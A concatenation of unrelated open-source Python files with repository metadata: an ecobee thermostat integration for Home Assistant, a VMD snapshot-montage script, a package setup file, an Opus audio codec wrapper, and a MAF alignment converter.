"""Get the latest state from the thermostat."""
if self.update_without_throttle:
await self.data.update(no_throttle=True)
self.update_without_throttle = False
else:
await self.data.update()
self.thermostat = self.data.ecobee.get_thermostat(self.thermostat_index)
if self.hvac_mode != HVAC_MODE_OFF:
self._last_active_hvac_mode = self.hvac_mode
@property
def available(self):
"""Return if device is available."""
return self.thermostat["runtime"]["connected"]
@property
def supported_features(self):
"""Return the list of supported features."""
if self.has_humidifier_control:
return SUPPORT_FLAGS | SUPPORT_TARGET_HUMIDITY
return SUPPORT_FLAGS
@property
def name(self):
"""Return the name of the Ecobee Thermostat."""
return self.thermostat["name"]
@property
def unique_id(self):
"""Return a unique identifier for this ecobee thermostat."""
return self.thermostat["identifier"]
@property
def device_info(self) -> DeviceInfo:
"""Return device information for this ecobee thermostat."""
model: str | None
try:
model = f"{ECOBEE_MODEL_TO_NAME[self.thermostat['modelNumber']]} Thermostat"
except KeyError:
# Ecobee model is not in our list
model = None
return DeviceInfo(
identifiers={(DOMAIN, self.thermostat["identifier"])},
manufacturer=MANUFACTURER,
model=model,
name=self.name,
)
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_FAHRENHEIT
@property
def precision(self) -> float:
"""Return the precision of the system."""
return PRECISION_TENTHS
@property
def current_temperature(self) -> float:
"""Return the current temperature."""
return self.thermostat["runtime"]["actualTemperature"] / 10.0
@property
def target_temperature_low(self) -> float | None:
"""Return the lower bound temperature we try to reach."""
if self.hvac_mode == HVAC_MODE_HEAT_COOL:
return self.thermostat["runtime"]["desiredHeat"] / 10.0
return None
@property
def target_temperature_high(self) -> float | None:
"""Return the upper bound temperature we try to reach."""
if self.hvac_mode == HVAC_MODE_HEAT_COOL:
return self.thermostat["runtime"]["desiredCool"] / 10.0
return None
@property
def target_temperature_step(self) -> float:
"""Set target temperature step to halves."""
return PRECISION_HALVES
@property
def has_humidifier_control(self):
"""Return true if humidifier connected to thermostat and set to manual/on mode."""
return (
self.thermostat["settings"]["hasHumidifier"]
and self.thermostat["settings"]["humidifierMode"] == HUMIDIFIER_MANUAL_MODE
)
@property
def target_humidity(self) -> int | None:
"""Return the desired humidity set point."""
if self.has_humidifier_control:
return self.thermostat["runtime"]["desiredHumidity"]
return None
@property
def min_humidity(self) -> int:
"""Return the minimum humidity."""
return DEFAULT_MIN_HUMIDITY
@property
def max_humidity(self) -> int:
"""Return the maximum humidity."""
return DEFAULT_MAX_HUMIDITY
@property
def target_temperature(self) -> float | None:
"""Return the temperature we try to reach."""
if self.hvac_mode == HVAC_MODE_HEAT_COOL:
return None
if self.hvac_mode == HVAC_MODE_HEAT:
return self.thermostat["runtime"]["desiredHeat"] / 10.0
if self.hvac_mode == HVAC_MODE_COOL:
return self.thermostat["runtime"]["desiredCool"] / 10.0
return None
@property
def fan(self):
"""Return the current fan status."""
if "fan" in self.thermostat["equipmentStatus"]:
return STATE_ON
return HVAC_MODE_OFF
@property
def fan_mode(self):
"""Return the fan setting."""
return self.thermostat["runtime"]["desiredFanMode"]
@property
def fan_modes(self):
"""Return the available fan modes."""
return self._fan_modes
@property
def preset_mode(self):
"""Return current preset mode."""
events = self.thermostat["events"]
for event in events:
if not event["running"]:
continue
if event["type"] == "hold":
if event["holdClimateRef"] in self._preset_modes:
return self._preset_modes[event["holdClimateRef"]]
# Any hold not based on a climate is a temp hold
return PRESET_TEMPERATURE
if event["type"].startswith("auto"):
# All auto modes are treated as holds
return event["type"][4:].lower()
if event["type"] == "vacation":
self.vacation = event["name"]
return PRESET_VACATION
return self._preset_modes[self.thermostat["program"]["currentClimateRef"]]
@property
def hvac_mode(self):
"""Return current operation."""
return ECOBEE_HVAC_TO_HASS[self.thermostat["settings"]["hvacMode"]]
@property
def hvac_modes(self):
"""Return the operation modes list."""
return self._operation_list
@property
def current_humidity(self) -> int | None:
"""Return the current humidity."""
return self.thermostat["runtime"]["actualHumidity"]
@property
def hvac_action(self):
"""Return current HVAC action.
Ecobee returns a CSV string with different equipment that is active.
We are prioritizing any heating/cooling equipment, otherwase look at
drying/fanning. Idle if nothing going on.
We are unable to map all actions to HA equivalents.
"""
if self.thermostat["equipmentStatus"] == "":
return CURRENT_HVAC_IDLE
actions = [
ECOBEE_HVAC_ACTION_TO_HASS[status]
for status in self.thermostat["equipmentStatus"].split(",")
if ECOBEE_HVAC_ACTION_TO_HASS[status] is not None
]
for action in (
CURRENT_HVAC_HEAT,
CURRENT_HVAC_COOL,
CURRENT_HVAC_DRY,
CURRENT_HVAC_FAN,
):
if action in actions:
return action
return CURRENT_HVAC_IDLE
@property
def extra_state_attributes(self):
"""Return device specific state attributes."""
status = self.thermostat["equipmentStatus"]
return {
"fan": self.fan,
"climate_mode": self._preset_modes[
self.thermostat["program"]["currentClimateRef"]
],
"equipment_running": status,
"fan_min_on_time": self.thermostat["settings"]["fanMinOnTime"],
}
@property
def is_aux_heat(self):
"""Return true if aux heater."""
return "auxHeat" in self.thermostat["equipmentStatus"]
async def async_turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
if not self.is_aux_heat:
_LOGGER.warning("# Changing aux heat is not supported")
async def async_turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
if self.is_aux_heat:
_LOGGER.warning("# Changing aux heat is not supported")
def set_preset_mode(self, preset_mode):
"""Activate a preset."""
if preset_mode == self.preset_mode:
return
self.update_without_throttle = True
# If we are currently in vacation mode, cancel it.
if self.preset_mode == PRESET_VACATION:
self.data.ecobee.delete_vacation(self.thermostat_index, self.vacation)
if preset_mode == PRESET_AWAY:
self.data.ecobee.set_climate_hold(
self.thermostat_index, "away", "indefinite", self.hold_hours()
)
elif preset_mode == PRESET_TEMPERATURE:
self.set_temp_hold(self.current_temperature)
elif preset_mode in (PRESET_HOLD_NEXT_TRANSITION, PRESET_HOLD_INDEFINITE):
self.data.ecobee.set_climate_hold(
self.thermostat_index,
PRESET_TO_ECOBEE_HOLD[preset_mode],
self.hold_preference(),
self.hold_hours(),
)
elif preset_mode == PRESET_NONE:
self.data.ecobee.resume_program(self.thermostat_index)
elif preset_mode in self.preset_modes:
climate_ref = None
for comfort in self.thermostat["program"]["climates"]:
if comfort["name"] == preset_mode:
climate_ref = comfort["climateRef"]
break
if climate_ref is not None:
self.data.ecobee.set_climate_hold(
self.thermostat_index,
climate_ref,
self.hold_preference(),
self.hold_hours(),
)
else:
_LOGGER.warning("Received unknown preset mode: %s", preset_mode)
else:
self.data.ecobee.set_climate_hold(
self.thermostat_index,
preset_mode,
self.hold_preference(),
self.hold_hours(),
)
@property
def preset_modes(self):
"""Return available preset modes."""
return list(self._preset_modes.values())
def set_auto_temp_hold(self, heat_temp, cool_temp):
"""Set temperature hold in auto mode."""
if cool_temp is not None:
cool_temp_setpoint = cool_temp
else:
cool_temp_setpoint = self.thermostat["runtime"]["desiredCool"] / 10.0
if heat_temp is not None:
heat_temp_setpoint = heat_temp
else:
heat_temp_setpoint = self.thermostat["runtime"]["desiredCool"] / 10.0
self.data.ecobee.set_hold_temp(
self.thermostat_index,
cool_temp_setpoint,
heat_temp_setpoint,
self.hold_preference(),
self.hold_hours(),
)
_LOGGER.debug(
"Setting ecobee hold_temp to: heat=%s, is=%s, cool=%s, is=%s",
heat_temp,
isinstance(heat_temp, (int, float)),
cool_temp,
isinstance(cool_temp, (int, float)),
)
self.update_without_throttle = True
def set_fan_mode(self, fan_mode):
"""Set the fan mode. Valid values are "on" or "auto"."""
if fan_mode.lower() not in (FAN_ON, FAN_AUTO):
error = "Invalid fan_mode value: Valid values are 'on' or 'auto'"
_LOGGER.error(error)
return
self.data.ecobee.set_fan_mode(
self.thermostat_index,
fan_mode,
self.hold_preference(),
holdHours=self.hold_hours(),
)
_LOGGER.info("Setting fan mode to: %s", fan_mode)
def set_temp_hold(self, temp):
"""Set temperature hold in modes other than auto.
Ecobee API: It is good practice to set the heat and cool hold
temperatures to be the same, if the thermostat is in either heat, cool,
auxHeatOnly, or off mode. If the thermostat is in auto mode, an
additional rule is required. The cool hold temperature must be greater
than the heat hold temperature by at least the amount in the
heatCoolMinDelta property.
https://www.ecobee.com/home/developer/api/examples/ex5.shtml
"""
if self.hvac_mode in (HVAC_MODE_HEAT, HVAC_MODE_COOL):
heat_temp = temp
cool_temp = temp
else:
delta = self.thermostat["settings"]["heatCoolMinDelta"] / 10.0
heat_temp = temp - delta
cool_temp = temp + delta
self.set_auto_temp_hold(heat_temp, cool_temp)
def set_temperature(self, **kwargs):
"""Set new target temperature."""
low_temp = kwargs.get(ATTR_TARGET_TEMP_LOW)
high_temp = kwargs.get(ATTR_TARGET_TEMP_HIGH)
temp = kwargs.get(ATTR_TEMPERATURE)
if self.hvac_mode == HVAC_MODE_HEAT_COOL and (
low_temp is not None or high_temp is not None
):
self.set_auto_temp_hold(low_temp, high_temp)
elif temp is not None:
self.set_temp_hold(temp)
else:
_LOGGER.error("Missing valid arguments for set_temperature in %s", kwargs)
def set_humidity(self, humidity):
"""Set the humidity level."""
if humidity not in range(0, 101):
raise ValueError(
f"Invalid set_humidity value (must be in range 0-100): {humidity}"
)
self.data.ecobee.set_humidity(self.thermostat_index, int(humidity))
self.update_without_throttle = True
def set_hvac_mode(self, hvac_mode):
"""Set HVAC mode (auto, auxHeatOnly, cool, heat, off)."""
ecobee_value = next(
(k for k, v in ECOBEE_HVAC_TO_HASS.items() if v == hvac_mode), None
)
if ecobee_value is None:
_LOGGER.error("Invalid mode for set_hvac_mode: %s", hvac_mode)
return
self.data.ecobee.set_hvac_mode(self.thermostat_index, ecobee_value)
self.update_without_throttle = True
def set_fan_min_on_time(self, fan_min_on_time):
"""Set the minimum fan on time."""
self.data.ecobee.set_fan_min_on_time(self.thermostat_index, fan_min_on_time)
self.update_without_throttle = True
def resume_program(self, resume_all):
"""Resume the thermostat schedule program."""
self.data.ecobee.resume_program(
self.thermostat_index, "true" if resume_all else "false"
)
self.update_without_throttle = True
def hold_preference(self):
"""Return user preference setting for hold time."""
# Values returned from thermostat are:
# "useEndTime2hour", "useEndTime4hour"
# "nextPeriod", "askMe"
# "indefinite"
device_preference = self.thermostat["settings"]["holdAction"]
# Currently supported pyecobee holdTypes:
# dateTime, nextTransition, indefinite, holdHours
hold_pref_map = {
"useEndTime2hour": "holdHours",
"useEndTime4hour": "holdHours",
"indefinite": "indefinite",
}
return hold_pref_map.get(device_preference, "nextTransition")
def hold_hours(self):
"""Return user preference setting for hold duration in hours."""
# Values returned from thermostat are:
# "useEndTime2hour", "useEndTime4hour"
# "nextPeriod", "askMe"
# "indefinite"
device_preference = self.thermostat["settings"]["holdAction"]
hold_hours_map = {
"useEndTime2hour": 2,
"useEndTime4hour": 4,
}
return hold_hours_map.get(device_preference)
def create_vacation(self, service_data):
"""Create a vacation with user-specified parameters."""
vacation_name = service_data[ATTR_VACATION_NAME]
cool_temp = convert(
service_data[ATTR_COOL_TEMP],
self.hass.config.units.temperature_unit,
TEMP_FAHRENHEIT,
)
heat_temp = convert(
service_data[ATTR_HEAT_TEMP],
self.hass.config.units.temperature_unit,
TEMP_FAHRENHEIT,
)
start_date = service_data.get(ATTR_START_DATE)
start_time = service_data.get(ATTR_START_TIME)
end_date = service_data.get(ATTR_END_DATE)
end_time = service_data.get(ATTR_END_TIME)
fan_mode = service_data[ATTR_FAN_MODE]
fan_min_on_time = service_data[ATTR_FAN_MIN_ON_TIME]
kwargs = {
key: value
for key, value in {
"start_date": start_date,
"start_time": start_time,
"end_date": end_date,
"end_time": end_time,
"fan_mode": fan_mode,
"fan_min_on_time": fan_min_on_time,
}.items()
if value is not None
}
_LOGGER.debug(
"Creating a vacation on thermostat %s with name %s, cool temp %s, heat temp %s, "
"and the following other parameters: %s",
self.name,
vacation_name,
cool_temp,
heat_temp,
kwargs,
)
self.data.ecobee.create_vacation(
self.thermostat_index, vacation_name, cool_temp, heat_temp, **kwargs
)
def delete_vacation(self, vacation_name):
"""Delete a vacation with the specified name."""
_LOGGER.debug(
"Deleting a vacation on thermostat %s with name %s",
self.name,
vacation_name,
)
self.data.ecobee.delete_vacation(self.thermostat_index, vacation_name)
def turn_on(self):
"""Set the thermostat to the last active HVAC mode."""
_LOGGER.debug(
"Turning on ecobee thermostat %s in %s mode",
self.name,
self._last_active_hvac_mode,
)
self.set_hvac_mode(self._last_active_hvac_mode)
def set_dst_mode(self, dst_enabled):
"""Enable/disable automatic daylight savings time."""
self.data.ecobee.set_dst_mode(self.thermostat_index, dst_enabled)
def set_mic_mode(self, mic_enabled):
"""Enable/disable Alexa mic (only for Ecobee 4)."""
self.data.ecobee.set_mic_mode(self.thermostat_index, mic_enabled)
def set_occupancy_modes(self, auto_away=None, follow_me=None):
"""Enable/disable Smart Home/Away and Follow Me modes."""
self.data.ecobee.set_occupancy_modes(
self.thermostat_index, auto_away, follow_me
)
|
jawilson/home-assistant
|
homeassistant/components/ecobee/climate.py
|
Python
|
apache-2.0
| 28,471
|
[
"VisIt"
] |
85d424a9af6d94c32dea4bd5cea6d5cd224f69e883d1ff0ff75b2de36e3d4c34
|
from optparse import OptionParser, OptionValueError
import tempfile
import os
import subprocess
import optparse
import shutil
import math
def wh_size(option, opt_str, value, parser, *args, **kwargs):
try:
setattr(parser.values, option.dest, map(int, value.split(',')))
except:
raise OptionValueError("You must use a 2-tuple to define width and height (in tiles).")
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-i", dest="input")
parser.add_option("-o", dest="output")
parser.add_option("-f", dest="num_frames", type="int")
parser.add_option("-v", dest="vmd_vis")
parser.add_option('-s', dest="dim", type = "string", action="callback", callback=wh_size)
(options, args) = parser.parse_args()
# Check number of frames
num_models = int(subprocess.check_output(["egrep", "-c", "^MODEL", options.input]))
if options.num_frames is None:
target_num_frames = num_models
else:
target_num_frames = options.num_frames
# Calculate the step
the_step = int(math.floor(float(num_models)/target_num_frames))
# Generate the new vis file
if options.vmd_vis is not None:
vmd_vis = open(options.vmd_vis,"r").read()
else:
vmd_vis = "mol load pdb %s\n"%options.input
new_vis_lines = """# Fit molecules (from vmd tuts.)
set reference_sel [atomselect top "protein" frame 0]
set comparison_sel [atomselect top "protein" frame %d]
set transformation_mat [measure fit $comparison_sel $reference_sel]
set move_sel [atomselect top "all" frame %d]
$move_sel move $transformation_mat
# render it
animate goto %d
render TachyonInternal %s
exit
"""
vmd_vis = vmd_vis.replace("%", "%%")
new_vis = vmd_vis + new_vis_lines
# Execute the vis file and render
dir_path = tempfile.mkdtemp()
images = []
for i in range(0, num_models, the_step):
vis_file_path = os.path.join(dir_path, "%d.vis"%i)
vis_file = open(vis_file_path, "w")
image_name = "%03d.tga"%i
conv_image_name = "%03d.png"%i
image_path = os.path.join(dir_path, image_name)
conv_image_path = os.path.join(dir_path, conv_image_name)
new_vis_contents = new_vis%(i, i, i, image_path)
vis_file.write(new_vis_contents)
vis_file.close()
os.system("vmd -dispdev none -e %s"%vis_file_path)
os.system("convert -gravity North -pointsize 30 -annotate +0+10 '%d' %s %s"%(i,
image_path,
conv_image_path))
print dir_path
#mount everything
images_glob = os.path.join(dir_path, "???.png")
os.system("montage %s -mode concatenate -tile %dx%d %s"%(
images_glob,
options.dim[0],
options.dim[1],
options.output
))
shutil.rmtree(dir_path)
|
victor-gil-sepulveda/PhD-VMDSnapshotTiles
|
take_snapshots.py
|
Python
|
mit
| 3,203
|
[
"VMD"
] |
077b53f0ba9a9c72a445ed08f10749ed197bb292449b085c50d3c6d82dc50bc8
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup
setup( name = 'gedi',
packages = ['gedi'],
version = '0.3.1',
description = 'Package to analyze radial velocity measurements using Gaussian processes made for a MSc Thesis',
author = 'Joao Camacho',
author_email = 'joao.camacho@astro.up.pt',
license='MIT',
url = 'https://github.com/jdavidrcamacho/Gedi',
keywords = ['Gaussian', 'process','radial','velocity','exoplanet'],
classifiers = ['License :: OSI Approved :: MIT License'],
install_requires=[
'numpy',
'scipy',
'matplotlib>=1.5.3',
'emcee'
],
)
|
jdavidrcamacho/Gedi
|
setup.py
|
Python
|
mit
| 634
|
[
"Gaussian"
] |
494b74a00c6e94636303b08f77e8ec4e3a9a6d74c8cdc3f164d3248c29a2b38a
|
#!/usr/bin/python
#Audio Tools, a module and set of tools for manipulating audio data
#Copyright (C) 2007-2012 Brian Langenberger
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from audiotools import (AudioFile, InvalidFile)
from .vorbis import (VorbisAudio, VorbisChannelMask)
from .vorbiscomment import VorbisComment
class InvalidOpus(InvalidFile):
pass
#######################
#Vorbis File
#######################
class OpusAudio(VorbisAudio):
"""an Opus file"""
SUFFIX = "opus"
NAME = "opus"
DESCRIPTION = u"Opus Audio Codec"
DEFAULT_COMPRESSION = "10"
COMPRESSION_MODES = tuple(map(str, range(0, 11)))
COMPRESSION_DESCRIPTIONS = {"0": u"lowest quality, fastest encode",
"10": u"best quality, slowest encode"}
BINARIES = ("opusenc", "opusdec")
def __init__(self, filename):
"""filename is a plain string"""
AudioFile.__init__(self, filename)
self.__channels__ = 0
self.__channel_mask__ = 0
#get channel count and channel mask from first packet
from .bitstream import BitstreamReader
try:
f = open(filename, "rb")
try:
ogg_reader = BitstreamReader(f, 1)
(magic_number,
version,
header_type,
granule_position,
self.__serial_number__,
page_sequence_number,
checksum,
segment_count) = ogg_reader.parse(
"4b 8u 8u 64S 32u 32u 32u 8u")
if (magic_number != 'OggS'):
from .text import ERR_OGG_INVALID_MAGIC_NUMBER
raise InvalidFLAC(ERR_OGG_INVALID_MAGIC_NUMBER)
if (version != 0):
from .text import ERR_OGG_INVALID_VERSION
raise InvalidFLAC(ERR_OGG_INVALID_VERSION)
segment_length = ogg_reader.read(8)
(opushead,
version,
self.__channels__,
pre_skip,
input_sample_rate,
output_gain,
mapping_family) = ogg_reader.parse(
"8b 8u 8u 16u 32u 16s 8u")
if (opushead != "OpusHead"):
from .text import ERR_OPUS_INVALID_TYPE
raise InvalidOpus(ERR_OPUS_INVALID_TYPE)
if (version != 1):
from .text import ERR_OPUS_INVALID_VERSION
raise InvalidOpus(ERR_OPUS_INVALID_VERSION)
if (self.__channels__ == 0):
from .text import ERR_OPUS_INVALID_CHANNELS
raise InvalidOpus(ERR_OPUS_INVALID_CHANNELS)
#FIXME - assign channel mask from mapping family
if (mapping_family == 0):
if (self.__channels__ == 1):
self.__channel_mask__ = VorbisChannelMask(0x4)
elif (self.__channels__ == 2):
self.__channel_mask__ = VorbisChannelMask(0x3)
else:
self.__channel_mask__ = VorbisChannelMask(0)
else:
(stream_count,
coupled_stream_count) = ogg_reader.parse("8u 8u")
if (self.__channels__ !=
((coupled_stream_count * 2) +
(stream_count - coupled_stream_count))):
from .text import ERR_OPUS_INVALID_CHANNELS
raise InvalidOpus(ERR_OPUS_INVALID_CHANNELS)
channel_mapping = [ogg_reader.read(8)
for i in xrange(self.__channels__)]
finally:
f.close()
except IOError, msg:
raise InvalidOpus(str(msg))
def update_metadata(self, metadata):
"""takes this track's current MetaData object
as returned by get_metadata() and sets this track's metadata
with any fields updated in that object
raises IOError if unable to write the file
"""
from .bitstream import BitstreamReader
from .bitstream import BitstreamRecorder
from .bitstream import BitstreamWriter
from .ogg import OggStreamWriter
from .ogg import OggStreamReader
from .ogg import read_ogg_packets_data
from . import iter_first
from .vorbiscomment import VorbisComment
if (metadata is None):
return
if (not isinstance(metadata, OpusTags)):
from .text import ERR_FOREIGN_METADATA
raise ValueError(ERR_FOREIGN_METADATA)
original_reader = BitstreamReader(open(self.filename, "rb"), 1)
original_ogg = OggStreamReader(original_reader)
original_serial_number = original_ogg.serial_number
original_packets = read_ogg_packets_data(original_reader)
#save the current file's identification page/packet
#(the ID packet is always fixed size, and fits in one page)
identification_page = original_ogg.read_page()
#discard the current file's comment packet
original_packets.next()
#save all the subsequent Ogg pages
data_pages = list(original_ogg.pages())
del(original_ogg)
del(original_packets)
original_reader.close()
updated_writer = BitstreamWriter(open(self.filename, "wb"), 1)
updated_ogg = OggStreamWriter(updated_writer, original_serial_number)
#write the identification packet in its own page
updated_ogg.write_page(*identification_page)
#write the new comment packet in its own page(s)
comment_writer = BitstreamRecorder(1)
comment_writer.write_bytes("OpusTags")
vendor_string = metadata.vendor_string.encode('utf-8')
comment_writer.build("32u %db" % (len(vendor_string)),
(len(vendor_string), vendor_string))
comment_writer.write(32, len(metadata.comment_strings))
for comment_string in metadata.comment_strings:
comment_string = comment_string.encode('utf-8')
comment_writer.build("32u %db" % (len(comment_string)),
(len(comment_string), comment_string))
for (first_page, segments) in iter_first(
updated_ogg.segments_to_pages(
updated_ogg.packet_to_segments(comment_writer.data()))):
updated_ogg.write_page(0, segments, 0 if first_page else 1, 0, 0)
#write the subsequent Ogg pages
for page in data_pages:
updated_ogg.write_page(*page)
@classmethod
def supports_replay_gain(cls):
"""returns True if this class supports ReplayGain"""
return False
def set_metadata(self, metadata):
"""takes a MetaData object and sets this track's metadata
this metadata includes track name, album name, and so on
raises IOError if unable to write the file"""
if (metadata is not None):
metadata = OpusTags.converted(metadata)
old_metadata = self.get_metadata()
#port vendor string from old metadata to new metadata
metadata.vendor_string = old_metadata.vendor_string
#remove REPLAYGAIN_* tags from new metadata (if any)
for key in [u"REPLAYGAIN_TRACK_GAIN",
u"REPLAYGAIN_TRACK_PEAK",
u"REPLAYGAIN_ALBUM_GAIN",
u"REPLAYGAIN_ALBUM_PEAK",
u"REPLAYGAIN_REFERENCE_LOUDNESS"]:
try:
metadata[key] = old_metadata[key]
except KeyError:
metadata[key] = []
#port "ENCODER" tag from old metadata to new metadata
if (u"ENCODER" in old_metadata):
metadata[u"ENCODER"] = old_metadata[u"ENCODER"]
self.update_metadata(metadata)
def get_metadata(self):
"""returns a MetaData object, or None
raises IOError if unable to read the file"""
from .bitstream import BitstreamReader
from .ogg import read_ogg_packets
from .vorbiscomment import VorbisComment
packets = read_ogg_packets(
BitstreamReader(open(self.filename, "rb"), 1))
identification = packets.next()
comment = packets.next()
if (comment.read_bytes(8) != "OpusTags"):
return None
else:
vendor_string = \
comment.read_bytes(comment.read(32)).decode('utf-8')
comment_strings = [
comment.read_bytes(comment.read(32)).decode('utf-8')
for i in xrange(comment.read(32))]
return OpusTags(comment_strings, vendor_string)
def delete_metadata(self):
"""deletes the track's MetaData
this removes or unsets tags as necessary in order to remove all data
raises IOError if unable to write the file"""
from . import MetaData
#the comment packet is required,
#so simply zero out its contents
self.set_metadata(MetaData())
def total_frames(self):
"""returns the total PCM frames of the track as an integer"""
from .bitstream import BitstreamReader
pcm_samples = 0
end_of_stream = 0
try:
ogg_stream = BitstreamReader(file(self.filename, "rb"), 1)
while (end_of_stream == 0):
(magic_number,
version,
end_of_stream,
granule_position,
page_segment_count) = ogg_stream.parse(
"4b 8u 1p 1p 1u 5p 64S 32p 32p 32p 8u")
ogg_stream.skip_bytes(sum([ogg_stream.read(8) for i in
xrange(page_segment_count)]))
if ((magic_number != "OggS") or (version != 0)):
return 0
if (granule_position >= 0):
pcm_samples = granule_position
ogg_stream.close()
return pcm_samples
except IOError:
return 0
def sample_rate(self):
"""returns the rate of the track's audio as an integer number of Hz"""
return 48000
def to_pcm(self):
"""returns a PCMReader object containing the track's PCM data
if an error occurs initializing a decoder, this should
return a PCMReaderError with an appropriate error message"""
from . import PCMReader
from . import BIN
import subprocess
import os
sub = subprocess.Popen([BIN["opusdec"], "--quiet",
"--rate", str(48000),
self.filename, "-"],
stdout=subprocess.PIPE,
stderr=file(os.devnull, "a"),
creationflags=0x08000000)
pcmreader = PCMReader(sub.stdout,
sample_rate=self.sample_rate(),
channels=self.channels(),
channel_mask=int(self.channel_mask()),
bits_per_sample=self.bits_per_sample(),
process=sub)
if (self.channels() <= 2):
return pcmreader
elif (self.channels() <= 8):
from . import ReorderedPCMReader
standard_channel_mask = self.channel_mask()
vorbis_channel_mask = VorbisChannelMask(self.channel_mask())
return ReorderedPCMReader(
pcmreader,
[vorbis_channel_mask.channels().index(channel) for channel in
standard_channel_mask.channels()])
else:
return pcmreader
@classmethod
def from_pcm(cls, filename, pcmreader, compression=None):
"""encodes a new file from PCM data
takes a filename string, PCMReader object
and optional compression level string
encodes a new audio file from pcmreader's data
at the given filename with the specified compression level
and returns a new AudioFile-compatible object
for example, to encode the FlacAudio file "file.flac" from "file.wav"
at compression level "5":
>>> flac = FlacAudio.from_pcm("file.flac",
... WaveAudio("file.wav").to_pcm(),
... "5")
may raise EncodingError if some problem occurs when
encoding the input file. This includes an error
in the input stream, a problem writing the output file,
or even an EncodingError subclass such as
"UnsupportedBitsPerSample" if the input stream
is formatted in a way this class is unable to support
"""
from . import transfer_framelist_data
from . import BIN
from . import ignore_sigint
from . import EncodingError
from . import DecodingError
from . import UnsupportedChannelMask
from . import __default_quality__
import subprocess
import os
if (((compression is None) or
(compression not in cls.COMPRESSION_MODES))):
compression = __default_quality__(cls.NAME)
devnull = file(os.devnull, 'ab')
sub = subprocess.Popen([BIN["opusenc"], "--quiet",
"--comp", compression,
"--raw",
"--raw-bits", str(pcmreader.bits_per_sample),
"--raw-rate", str(pcmreader.sample_rate),
"--raw-chan", str(pcmreader.channels),
"--raw-endianness", str(0),
"-", filename],
stdin=subprocess.PIPE,
stdout=devnull,
stderr=devnull,
creationflags=0x08000000)
try:
transfer_framelist_data(pcmreader, sub.stdin.write)
except (IOError, ValueError), err:
sub.stdin.close()
sub.wait()
cls.__unlink__(filename)
raise EncodingError(str(err))
except Exception, err:
sub.stdin.close()
sub.wait()
cls.__unlink__(filename)
raise err
sub.stdin.close()
if (sub.wait() == 0):
return OpusAudio(filename)
else:
raise EncodingError(u"unable to encode file with opusenc")
def verify(self, progress=None):
"""verifies the current file for correctness
returns True if the file is okay
raises an InvalidFile with an error message if there is
some problem with the file"""
#Ogg stream verification is likely to be so fast
#that individual calls to progress() are
#a waste of time.
if (progress is not None):
progress(0, 1)
try:
f = open(self.filename, 'rb')
except IOError, err:
raise InvalidOpus(str(err))
try:
try:
from . import verify
verify.ogg(f)
if (progress is not None):
progress(1, 1)
return True
except (IOError, ValueError), err:
raise InvalidOpus(str(err))
finally:
f.close()
class OpusTags(VorbisComment):
@classmethod
def converted(cls, metadata):
"""converts metadata from another class to OpusTags"""
from . import VERSION
if (metadata is None):
return None
elif (isinstance(metadata, OpusTags)):
return cls(metadata.comment_strings[:],
metadata.vendor_string)
elif (metadata.__class__.__name__ == 'FlacMetaData'):
if (metadata.has_block(4)):
vorbis_comment = metadata.get_block(4)
return cls(vorbis_comment.comment_strings[:],
vorbis_comment.vendor_string)
else:
return cls([], u"Python Audio Tools %s" % (VERSION))
elif (metadata.__class__.__name__ in ('Flac_VORBISCOMMENT',
'VorbisComment')):
return cls(metadata.comment_strings[:],
metadata.vendor_string)
else:
comment_strings = []
for (attr, key) in cls.ATTRIBUTE_MAP.items():
value = getattr(metadata, attr)
if (value is not None):
comment_strings.append(u"%s=%s" % (key, value))
return cls(comment_strings, u"Python Audio Tools %s" % (VERSION))
def __repr__(self):
return "OpusTags(%s, %s)" % \
(repr(self.comment_strings), repr(self.vendor_string))
def __comment_name__(self):
return u"Opus Tags"
|
R-a-dio/python-audio-tools
|
audiotools/opus.py
|
Python
|
gpl-2.0
| 17,730
|
[
"Brian"
] |
8451e304d1e8b6dbae8a383216e511f8a5e26d74a034fdb64e2057a5ae4db790
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
MAF format specification:
<http://genome.ucsc.edu/FAQ/FAQformat#format5>
"""
import sys
from bx import interval_index_file
from bx.align import maf
from maize.formats.base import BaseFile
from jcvi.formats.maf import Maf
from maize.apps.base import need_update
from maize.apps.lastz import blastz_score_to_ncbi_expectation, \
blastz_score_to_ncbi_bits
def main():
import argparse
parser = argparse.ArgumentParser(
formatter_class = argparse.ArgumentDefaultsHelpFormatter,
description = ''
)
sp = parser.add_subparsers(title = 'available commands', dest = 'command')
sp1 = sp.add_parser('bed', help='convert MAF to BED format',
formatter_class = argparse.ArgumentDefaultsHelpFormatter)
sp1.add_argument('i', help = '')
sp1.set_defaults(func = bed)
sp1 = sp.add_parser('blast', help='convert MAF to BLAST tabular format',
formatter_class = argparse.ArgumentDefaultsHelpFormatter)
sp1.add_argument('i', help = '')
sp1.set_defaults(func = blast)
args = parser.parse_args()
if args.command:
args.func(args)
else:
print('Error: need to specify a sub command\n')
parser.print_help()
def bed(args):
"""
%prog bed maffiles > out.bed
Convert a folder of maf alignments to the bed features
then useful to check coverage, etc.
"""
p = OptionParser(bed.__doc__)
opts, args = p.parse_args(args)
if len(args) != 1:
sys.exit(p.print_help())
flist = args
prefix = flist[0].split(".")[0]
j = 0
for f in flist:
reader = Maf(f).reader
for rec in reader:
a, b = rec.components
for a, tag in zip((a, b), "ab"):
name = "{0}_{1:07d}{2}".format(prefix, j, tag)
print("\t".join(str(x) for x in (a.src, a.forward_strand_start, a.forward_strand_end, name)))
j += 1
def alignment_details(a, b):
nmatch = 0
nmismatch = 0
ngaps = 0
assert len(a) == len(b)
l = len(a)
for i in range(l):
if a[i] == b[i]:
nmatch += 1
elif a[i] == "-" or b[i] == "-":
ngaps += 1
else:
nmismatch += 1
pctid = 100. * nmatch / l
return pctid, nmismatch, ngaps
def maf_to_blast8(f):
reader = Maf(f).reader
for rec in reader:
a, b = rec.components
query = a.src
subject = b.src
qstart = a.forward_strand_start
